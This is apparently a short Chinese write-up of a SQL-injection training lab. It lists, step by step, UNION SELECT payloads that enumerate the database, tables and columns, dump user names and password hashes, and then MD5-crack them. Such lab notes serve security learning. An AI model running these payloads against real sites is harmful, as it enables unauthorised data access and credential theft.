- 测试后发现是字符型 4个字段,回显是2和3 ?id=’ union select 1,2,3,4 – -
2. 查看库名 ?id=’ union select 1,database(),version(),4 – - mozhe_discuz_stormgroup
3.查看表名,测试后发现有两个 notice和stormgroup_member
?id=’ union select 1,table_name,version(),4 from information_schema.tables where table_schema=‘mozhe_discuz_stormgroup’ limit 0,1 – -
4.查看字段名 4个字段名
?id=’ union select 1,column_name,column_type,4 from information_schema.columns where table_name=‘stormgroup_member’ limit 0,1 – -
5.?id=’ union select 1,concat(name,’ ‘,password,’ ',status),3,4 from mozhe_discuz_stormgroup.stormgroup_member limit 0,1 – -
6.md5一下
